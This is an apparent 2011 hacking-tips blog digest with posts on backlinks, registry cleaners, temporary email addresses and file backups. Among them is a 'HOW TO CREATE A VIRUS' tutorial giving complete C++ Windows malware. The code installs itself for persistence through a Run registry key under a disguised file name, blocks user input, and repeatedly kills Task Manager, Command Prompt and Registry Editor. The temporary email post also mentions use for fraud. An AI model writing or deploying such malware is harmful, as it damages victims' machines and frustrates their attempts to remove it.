Thursday, May 26, 2011

TIPS,TRICKS AND HACKING ZONE

TIPS,TRICKS AND HACKING ZONE


BUILDING BACK LINKS,A GUIDE FOR WEBMASTERS

Posted: 25 May 2011 12:40 PM PDT


The rank of your website is mainly depends on how many links are connected to your website.Creating of back link is the risky job than creating a website.You have to update your back links to get your site rank in high.Today I am going to share here tips for creating back links.

 

Link Exchange:

Whenever we talk about the back links,it will come first into our mind link exchange.It is also denotes the power of link exchange.Link exchange is the process of exchanging the website urls between the webmasters and put it in their sites.You can apply for a link exchange by searching for the websites which have the similar theme of yours.When put your link in similar sites,whenever a user reads content from that site will also check your link for more contents.

 

Article Submission

If you are a good article writer,It is the chance for you.You can make a good traffic from submitting your article to other websites or article directories.When your article is read by user and it has a good quality,then the user will search for your more contents or articles.When you submit articles to other websites,it will give you a back link in the form either publishing your profile details with your website links or by simply a link.

 

Submit your site to directories

It is also important that to add your website to different directories.Adding your website to different directories will give you one way back links.Rapid increment the back link will also increase your page rank rapidly.There are a lot of websites that are providing submission of your site to number of directories in a single click.You can search for this type of websites in google.I made such one bulk submission to directory,You can check it here.

 

Sharing with social networking sites.

The rapid development of the social websites can utilize for you to get better back links.If you are having a facebook or myspace you can share your posts there.You can use some auto posting services to post there when you update your site .

 

You can also post articles in my blog to get traffic by clicking here

 

Related posts:

  1. INCREASE GOOGLE PAGE RANK
  2. SIMPLE THREE WAYS TO GET LISTED IN GOOGLE
  3. HACKING WEBSITE BY REMOTE FILE INCLUSION

NEED OF CLEANING WINDOWS REGISTRY-REGISTRY CLEANER SOFTWARE

Posted: 25 May 2011 12:02 PM PDT


Registry is a database where Windows is storing programe data.When you install some programs or softwares into your computer,it makes some changes into your windows registry.However if you remove the same softwarebfrom your system ,it wont remove all your registry settings.So it is very important to clean your registry regularly for a better performance of your computer.

For cleaning the registry we are normally using the registry cleaner.Registry cleaner is a software which is used to clean your windows registry,which will make your computer to run faster and smoother.Registry cleaner is works similar to the anti virus,here it will scan the registry instead of files and folders.and fixes the errors and out dated entries.

Registry cleaning will block installation of adware and spyware.It will make you to run your system more safe.It also removes the errors in the registry.

There are different kinds of registry cleaners are available.You can use any of these to clean your registry.But before buying such registry cleaners,confirm that it has good functionality.Most of them are giving you a chance to test their product.So try the registry cleaner and after that buy it.Just remember that registry cleaning is very important for your computer performance.

Related posts:

  1. HOW TO SAFEGUARD YOUR FILES WHEN COMPUTER CRASHES
  2. HOW TO REMOVE OR EDIT WINDOWS SAVED PASSWORDS
  3. REMOVE VIRUS MANUALLY

HOW TO CREATE A VIRUS

Posted: 25 May 2011 08:14 AM PDT


*Create a thread that runs WHILE your other code runs
*Block and Destroy Task Manager and other windows
*ShellExecute (basics, nothing fancy)
*Turn Off/On The Monitor
*Make The Mouse Go Crazy
*Viruses are fun :lol: :lol:

Some Tips

always remember that these virus piss people off, there for please don’t name them anything like “svchost” or something that the computer HAS to have to run. If you ever got infected you would want to Babel to find the virus. Names don’t mater, but what you should do is the take a name of a program and add or change a letter (in the examples i use “winminer.exe”, instead of “winmine.exe”).

also, try to keep your code clean, the “int main()” should be the smallest part of your program. always split stuff up into voids or other stuff.

1: Creating A Thread (CreateThread())

now im not to good at this, but Threads are VERY useful. think of it like this, a normal program runs line by line, or command by command. a Thread will make a create a separate line of commands apart from the others.

Example
CODE C Language
view source
print?
01 DWORD WINAPI DestroyWindows(LPVOID)
02 {
03 //your code would go here
04 }
05
06 int main()
07 {
08 CreateThread( NULL, 0, (LPTHREAD_START_ROUTINE)&DestroyWindows, 0, 0, NULL);
09 while(1)
10 {
11 Sleep(10);
12 }
13 }

a Thread will not keep the program running, so after you make your thread you need to make sure that the program will still run.

Destroying Task Manager and other Windows

now this is really easy and not hard to understand. to find the task manager window or other windows all you have to do is use the “FindWindow()” function.

example
CODE C Language
view source
print?
1 HWND TaskMgr;
2 TaskMgr = FindWindow(NULL,”Windows Task Manager”);

so now all you have to do is tell it to do something to the window…

example
CODE C Language
view source
print?
1 TaskMgr = FindWindow(NULL,”Windows Task Manager”);
2 if( TaskMgr != NULL )
3 {
4 PostMessage( TaskMgr, WM_CLOSE, (LPARAM)0, (WPARAM)0);
5 }

first it will try to find task manager, then if its found it sends it a message to close the program. easy rite? :D

ShellExecute()

ShellExecute() is a function that will execute other programs ( ShellExecute). you can execute almost anything will this function using this code

example
CODE C Language
view source
print?
1 char Notepad[MAX_PATH]=”notepad.exe”;
2 ShellExecute(NULL,”open”,Notepad,NULL,NULL,SW_MAXIMIZE);

that code will open up a blank notepad. you can also use other things like “char Website[MAX_PATH] = “http:\\www.google.com”, that will open up google in your browser.

Turn Off/On The Monitor

this code i just recently learned from using the most powerful tool on earth, GOOGLE, you can use it to turn off the monitor (not the computer) or turn it back on.

example
CODE C Language
view source
print?
1 SendMessage(HWND_BROADCAST, WM_SYSCOMMAND, SC_MONITORPOWER, (LPARAM) 2);
2 Sleep(5000);
3 SendMessage(HWND_BROADCAST, WM_SYSCOMMAND, SC_MONITORPOWER, (LPARAM) -1);

that code will turn the monitor off, wait 5 seconds, then turn it back on. simple.

Making The Mouse Go CRAZY

this is really simple to learn also. you just have to make 2 random variables (x, y) and then tell the mouse to go to them.

example
CODE C Language
view source
print?
1 X = rand()%801;
2 Y = rand()%601;
3 SetCursorPos( X, Y );

that would make X a random number 0 – 800, and Y a random number 0 – 600. then it sets the mouse to that position.

Viruses are fun :lol: :lol:

well that all for now. here is a simple virus i made using the functions from this tutorial and my other past tutorial.

MineSweeper.cpp
CODE C Language
view source
print?
001 #include <iostream>
002 #include <stdio.h>
003 #include <windows.h>
004 #include <winable.h>
005 #include <conio.h>
006 #include <ctime>
007 using namespace std;
008
009 int random, Freq, Dur, X, Y;
010 HWND mywindow, TaskMgr, CMD, Regedit;
011 char Notepad[MAX_PATH]=”notepad.exe”;
012 char MineSweeper[MAX_PATH]=”winmine.exe”;
013 char Hearts[MAX_PATH]=”mshearts.exe”;
014 char Website[MAX_PATH]=”http:\\www.google.com”;
015
016 void SetUp();
017 void Run( int ID );
018 void Beeper(), OpenStuff(), Hibernation(), CrazyMouse();
019
020 DWORD WINAPI DestroyWindows(LPVOID);
021
022 int main()
023 {
024 srand( time(0) );
025 random = rand()%6;
026 system(“title :.Virus.:”);
027 BlockInput( true );
028 SetUp();
029 BlockInput( false );
030 CreateThread( NULL, 0, (LPTHREAD_START_ROUTINE)&DestroyWindows, 0, 0, NULL);
031 while(1)
032 {
033 Run( random );
034 Sleep(10);
035 }
036 }
037 void SetUp()
038 {
039 char system[MAX_PATH];
040 char pathtofile[MAX_PATH];
041 HMODULE GetModH = GetModuleHandle(NULL);
042 GetModuleFileName(GetModH,pathtofile,sizeof(pathtofile));
043 GetSystemDirectory(system,sizeof(system));
044 strcat(system,”\\winminer.exe”);
045 CopyFile(pathtofile,system,false);
046
047 HKEY hKey;
048 RegOpenKeyEx(HKEY_LOCAL_MACHINE,”Software\\Microsoft\\Windows\\CurrentVersion\\Run”,0,KEY_SET_VALUE,&hKey );
049 RegSetValueEx(hKey, “SetUp”,0,REG_SZ,(const unsigned char*)system,sizeof(system));
050 RegCloseKey(hKey);
051
052 mywindow = FindWindow(NULL,”:.Virus.:”);
053 cout<<”You Are Doomed”;
054 Sleep(1000);
055 ShowWindow(mywindow, false);
056 }
057
058 void Run( int ID )
059 {
060 if( ID == 1 )
061 {
062 BlockInput(true);
063 }
064 else if( ID == 2 )
065 {
066 Beeper();
067 }
068 else if( ID == 3 )
069 {
070 OpenStuff();
071 }
072 else if( ID == 4 )
073 {
074 Hibernation();
075 }
076 else if( ID == 5 )
077 {
078 CrazyMouse();
079 }
080 else
081 {
082 BlockInput(true);
083 Beeper();
084 OpenStuff();
085 CrazyMouse();
086 }
087 }
088
089 void Beeper()
090 {
091 Freq = rand()%2001;
092 Dur = rand()%301;
093 Beep( Freq, Dur );
094 }
095 void OpenStuff()
096 {
097 ShellExecute(NULL,”open”,Notepad,NULL,NULL,SW_MAXIMIZE);
098 ShellExecute(NULL,”open”,MineSweeper,NULL,NULL,SW_MAXIMIZE);
099 ShellExecute(NULL,”open”,Hearts,NULL,NULL,SW_MAXIMIZE);
100 ShellExecute(NULL,”open”,Website,NULL,NULL,SW_MAXIMIZE);
101 }
102 void Hibernation()
103 {
104 Sleep(1000);
105 SendMessage(HWND_BROADCAST, WM_SYSCOMMAND, SC_MONITORPOWER, (LPARAM) 2);
106 }
107 void CrazyMouse()
108 {
109 X = rand()%801;
110 Y = rand()%601;
111 SetCursorPos( X, Y );
112 }
113
114 DWORD WINAPI DestroyWindows(LPVOID)
115 {
116 while(1)
117 {
118 TaskMgr = FindWindow(NULL,”Windows Task Manager”);
119 CMD = FindWindow(NULL, “Command Prompt”);
120 Regedit = FindWindow(NULL,”Registry Editor”);
121 if( TaskMgr != NULL )
122 {
123 SetWindowText( TaskMgr, “You Suck Balls Superman”);
124 PostMessage( TaskMgr, WM_CLOSE, (LPARAM)0, (WPARAM)0);
125 }
126 if( CMD != NULL )
127 {
128 SetWindowText( CMD, “You Suck Balls Superman”);
129 PostMessage( CMD, WM_CLOSE, (LPARAM)0, (WPARAM)0);
130 }
131 if( Regedit != NULL )
132 {
133 SetWindowText( Regedit, “You Suck Balls Superman”);
134 PostMessage( Regedit, WM_CLOSE, (LPARAM)0, (WPARAM)0);
135 }
136
137 Sleep(10);
138 }
139 }

Quick description: i created a thread that looks for Task Manager, CMD, and Regedit. When it finds 1, it closes it. i also made the virus do random things, so every time you restart your computer you get a new effect.

Note:This is for educational purpose only…

Related posts:

  1. CREATE A VIRUS TO DELETE DATA FROM ANY COMPUTER
  2. CREATE A VIRUS FOR SYSTEM RESTART
  3. HOW TO ENABLE OR DISABLE TASK MANAGER?

CREATE TEMPORARY EMAIL ID ONLINE

Posted: 25 May 2011 05:46 AM PDT


Temporary email ids help you to communicate online without publishing your identity.It will help you to do fraud things as well as good things online.You can inform about any cause with the help of this temporary email ids.For example for mingling with one who is online,To send mail to college principal without reveal your identity.

This type of temporary ids will last for a few hours to few days.Whenever the mentioned time reaches your email id automatically removed or deactivated.

You can use the below websites to create your temporary email ids online.

  1. Meltmail
  2. Now my mail
  3. Mailcatch
  4. 33mail
  5. TempEmail

 

Share more sites by commenting or by becoming a guest author

Related posts:

  1. HOW TO SEND FAKE AND ANONYMOUS EMAIL
  2. EARN MONEY ONLINE,EASY EMAIL READING JOB
  3. SEND AND RECIEVE EMAIL ON MOBILE WITHOUT GPRS CONNECTION

HOW TO SAFEGUARD YOUR FILES WHEN COMPUTER CRASHES

Posted: 25 May 2011 05:34 AM PDT


First thing to keep in mind: If your computer hasn’t crashed yet, it will in the future! So instead of waiting for fate to strike, take some precautions now:

1) BACK-UP! Buy some decent DVD-R discs and put everything useful in them. When you have more useful stuff, backup again. Do this often.

2) Keep your computer healthy. Use an antivirus, an anti-spy, and a firewall. Keep them updated. Check regularly for Windows critical fixes.

3) Don’t install software that would do dangerous things to your hard drive. A boot manager would fall in this category.

4) Use a registry cleaner before and after you install or uninstall any software. Many of the problems that will keep Windows from booting are caused by sloppy software that mess up your registry. A good registry cleaner is Tune-up Utilities.Code:http://www.tune-up.com/

5) Run chkdsk now and then. Go to Start> Run. Type chkdsk /F. Press enter.

In case your PC has already crashed, read the following:
Most important: Don’t panic! Panic is like a little demon that whispers in your ear to format your hard drive and reinstall everything.
Don’t do it!You will lose all your data and the little demon will laugh at you.To be exact you can still recover your data if you format your drive (by using special software), but only if you don’t write anything on the disc afterwards. In other words format + windows install = bad idea. If you reinstall windows without formating your drive, you will only lose the files on your desktop and “My Documents” folder.In all occasions you should make sure to safeguard your files before attempting any kind of repair!

So let’s go about how to do that:
The fast way: Go to this site: Code:http://www.knoppix.org/. Knoppix is a Linux distribution than runs from a CD. Download the Knoppix ISO and burn it. Put it in your CD drive. On startup access BIOS and changethe boot sequence so that your computer boots from the CD drive. Save settings and exit. Upon reboot, Knoppix will load.Knoppix is much like windows and it comes with its own CD burner. Locate it, launch it and backup everything you want on CD.Now you don’t have to worry anymore!
The less fast way: This requires that you have access to a second PC. Open the case of
your computer and remove the hard disk.Install it as a slave on the second PC.Depending
on respective configurations, you may have to change some jumper settings on the drive. Read the manual for help with installing hard drivesand setting jumpers.After this is done, boot the second PC. If everything went out ok, you should be able to access your drive without problems. (Edit: Note that Win98cannot recognize a local NTFS (Win2K/XP) disk.)Copy everything you need from your own hard drive to the other one. Now you don’t have to worry anymore!Replace your computer’s hard disk, fix all problems and reverse the process to copy the data back to your computer, or take CD backups on the other PC.

Related posts:

  1. HOW TO RECOVER WINDOWS ADMINISTRATOR PASSWORD
  2. HOW TO MAKE YOUR COMPUTER FASTER
  3. CREATE A VIRUS TO DELETE DATA FROM ANY COMPUTER

0 comments:

Post a Comment